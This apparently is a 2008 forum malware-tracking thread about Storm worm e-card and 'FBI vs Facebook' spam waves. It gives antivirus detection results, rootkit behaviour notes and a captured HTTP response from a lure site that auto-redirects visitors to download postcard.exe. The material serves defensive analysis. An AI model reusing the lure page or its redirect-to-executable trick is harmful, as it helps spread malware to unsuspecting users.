Panda 9.0.0.4 2008.07.24 Suspicious file
PCTools 4.4.2.0 2008.07.24 -
Prevx1 V2 2008.07.24 -
Rising 20.54.32.00 2008.07.24 -
Sophos 4.31.0 2008.07.24 Mal/Dorf-O
Sunbelt 3.1.1536.1 2008.07.18 -
Symantec 10 2008.07.24 Trojan.Peacomm.D
TheHacker 6.2.96.387 2008.07.23 -
TrendMicro 8.700.0.1004 2008.07.24 -
VBA32 3.12.8.1 2008.07.24 -
ViRobot 2008.7.24.1309 2008.07.24 -
VirusBuster 4.5.11.0 2008.07.24 -
Webwasher-Gateway 6.6.2 2008.07.24 -

<h4>

Notes

</h4>

Modifies the settings related to the synchronization of Internet Time.
Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
A new memory page was created in the address space of %System%\services.exe
Request of inbound & outbound connections if your firewall intercepts them.
Config File: glok+serv.config

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Don't visit the pages, they contain an iframe leading to an encoded / obfuscated script and the same exploits as seen on June 20 th.
If the exploits don't trigger anything, a click on the link will download postcard.exe.

Kimberly

Jul 28 2008, 05:04 PM

<h4>

FBI vs Facebook

</h4>
FBI vs Facebook is the new theme chosen by the autors of storm.

<h4>

Detection of fbi_facebook.exe

</h4>
VirusTotal Results.

fbi_facebook.exe: 18/35 (51.43%)
glok+4009-7783.sys: 23/34 (67.65%)

<h4>

Notes

</h4>

Modifies the settings related to the synchronization of Internet Time.
Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
A new memory page was created in the address space of %System%\services.exe
Request of inbound & outbound connections if your firewall intercepts them.
Config File: glok+serv.config

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

ind.php is no longer included as an iframe on the page. At least for the time being victims will not be exposed to the exploits we saw in the other themes since June 20 th.

Kimberly

Aug 5 2008, 02:47 PM

<h4>

You have an Ecard

</h4>
Back to the Ecards. This time domains are used again instead of IP's.

<h4>

Detection of postcard.exe

</h4>
VirusTotal Results.

postcard.exe: 20/36 (55.56%)
glok+7d74-67d0.sys: 30/36 (83.34%)

<h4>

Notes

</h4>

Modifies the settings related to the synchronization of Internet Time.
Installation of a kernel-mode driver (rootkit). The service and the sys file are partially random: glok+[random 3 or 4 letters / numbers]-[random 3 or 4 letters / numbers]
A new memory page was created in the address space of %System%\services.exe
Request of inbound & outbound connections if your firewall intercepts them.
Config File: glok+serv.config

Note: %System% is a variable that refers to the System folder. By default, this is C:\Windows\System (Windows 95/98/Me), C:\Winnt\System32 (Windows NT/2000), or C:\Windows\System32 (Windows XP).

Again no exploits present on the pages.

CODE
GET /?e329c1e4a92b7d HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
Accept-Language: en-us
~~~~~~~~~~~~~~~: ~~~~~ ~~~~~~~
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: bestlettercard.com
Connection: Keep-Alive

HTTP/1.1 200 OK
Server: nginx/0.6.31
Date: Wed, 06 Aug 2008 01:25:38 GMT
Content-Type: text/html
Content-Length: 352
Connection: close
Accept-Ranges: bytes
Keep-Alive: Closed

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Postcard</title>
<meta http-equiv="Refresh" content="3; URL=postcard.exe">
</head>
<body>
<center>
Your download will start shortly.
If you are unable to see your postcard,
<a href="postcard.exe">save it</a> in and run on your computer.<br>
</center>
</body>
</html>